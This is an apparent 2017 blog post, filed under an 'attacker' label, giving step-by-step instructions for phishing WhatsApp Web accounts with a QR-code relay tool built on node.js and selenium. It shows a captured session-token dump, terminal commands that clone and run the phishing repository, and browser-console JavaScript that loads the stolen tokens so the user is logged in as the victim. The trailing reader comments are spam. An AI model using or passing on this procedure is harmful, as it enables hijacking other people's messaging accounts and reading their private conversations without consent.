Saturday, July 29, 2017

Home / attacker / HOW TO PHISING WHATSAPP 2017

HOW TO PHISING WHATSAPP 2017

by on in




download here
Download Whatsapp Phishing QR Tools.

The program uses node.js and socket.io for websites and selenium, a tool for scripting browsers, to communicate with the Whatsapp web client.

This program starts the http and socket.io servers. If a new client connects to socket.io the application will make a selenium sample request to start a new browser and connect to web.whatsapp.com. It will retrieve the QR code data and send it to the client via a websocket connection. The javascript client then shows the QR code to the user.

If the QR code is scanned, Whatsapp will authenticate a selenium-controlled browser and store multiple tokens in localStorage and document.cookie. We extracted the data and saved it into a text file. It will look like

{
   "s":{
      "remember-me":"true",
      "WAVersion":"\"0.1.4391\"",
      "qwefsdafadsdf==":"false",
      "debugCursor":"146",
      "WAWamDimensionCache":"{\"AppVersion\":\"0.1.4391\",\"BrowserVersion\
":\"Firefox 39.0\",\"DeviceName\":\"Linux x86_64\",\"WebcEnv\":0}",
      "WAToken2":"\"0.asldkamäsdflkasdfasdf\"",
      "WAWamLastRotate":"1439140177924",
      "WALangPref":"\"de-DE\"",
      "WAWamStatus":"\"completed\"",
      "y8fY/zQ8P+asdfadfg==":"[
        ...
      ]",
      "WAToken1":"\"asdf+ams,dfhlaskdjfhasdfasdf=\"",
      "Dexie.DatabaseNames":"[\"wawc\"]",
      "storage_test":"storage_test",
      "LKAJsdlksdjfasdf==":"false",
      "logout-token":"\"alkjsdhfkjashldkjpweoaLKNKASBkasjbdaksdjLKjhhndosiaosa
;AljkhJKhlKAJShkljqjDJSAOlkjbnhasdklWAdm==\"",
      "ver":"1",
      "whatsapp-mutex":"\"x781239870495:init0.987123490234\"",
      "WASecretBundle":"{\"key\":\"sldkfjsdf+asdlfijlasdkjfasdf=\",\"encKey\"
:\"asldkfjasldkfjsdfsdf0=\",\"macKey\":\"a,sdfasdf+alskdjföalskdhiopasdf=\"}",
      "WABrowserId":"\"aö,ksdjflöasdf==\""
   },
   "c":""
}
 
You can import this token into your browser and sign in as the person who scans the QR code.

  Download selenium standalone server jar and install Firefox if you do not already have one.
Type the following into your terminal
$ java -jar selenium-server.jar
$ # new terminal
$ git clone https://github.com/Mawalu/whatsapp-phishing.git
$ cd whatsapp-phishing
$ npm install
$ node index.js
 
 
    1. Open your browser and go to http: // localhost: 808 
    2. Run Whatsapp on your smartphone, go to Menu> Whatsapp Web and scan the QR code from your browser. 
    3. Copy the contents of the newly created secret file 
    4. Go to web.whatsapp.com. (Be careful that you are not logged in, maybe using incognito mode) 
    5. Go to your developer console 
    6. Enter the following code:

      > var t = CONTENT_OF_YOUR_SECRETS_FILE
> function login(token) {Object.keys(token.s).forEach(function (key) 
      {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)

      Reload the page
      You must be logged in as the person who scans the QR code




     
    Related Posts:
    By at
    Labels:

    5 comments:

    1. sasitamilFebruary 11, 2019 at 6:32 AM


      After reading this web site I am very satisfied simply because this site is providing comprehensive knowledge for you to audience.
      Thank you to the perform as well as discuss anything incredibly important in my opinion. We loose time waiting for your next article writing in addition to I beg one to get back to pay a visit to our website in


      Selenium training in Chennai
      Selenium training in Bangalore
      Selenium training in Pune

      ReplyDelete
    2. BalajiFebruary 25, 2019 at 2:07 PM

      This comment has been removed by the author.

      ReplyDelete
    3. Jiya RaniMay 9, 2020 at 5:44 PM

      The very next time I read a blog, Hopefully it won't fail me just as much as this one. After all, I know it was my choice to read, but I actually believed you would probably have something interesting to say. All I hear is a bunch of whining about something you can fix if you weren't too busy searching for KBC Official Website attention.

      ReplyDelete
    4. deivaSeptember 2, 2020 at 7:00 PM

      I am so happy to found your blog post because it's really very informative. Please keep writing this kind of blogs and I regularly visit this blog. Have a look at my services.
      data science training in chennai

      data science training in omr

      android training in chennai

      android training in omr

      devops training in chennai

      devops training in omr

      artificial intelligence training in chennai

      artificial intelligence training in omr

      ReplyDelete
    5. jeniSeptember 8, 2020 at 2:57 PM

      Thanks a lot very much for the high your blog post quality and results-oriented help. I won’t think twice to endorse to anybody who wants and needs support about this area.
      hadoop training in chennai

      hadoop training in velachery

      salesforce training in chennai

      salesforce training in velachery

      c and c plus plus course in chennai

      c and c plus plus course in velachery

      machine learning training in chennai

      machine learning training in velachery

      ReplyDelete

    Subscribe to: Post Comments (Atom)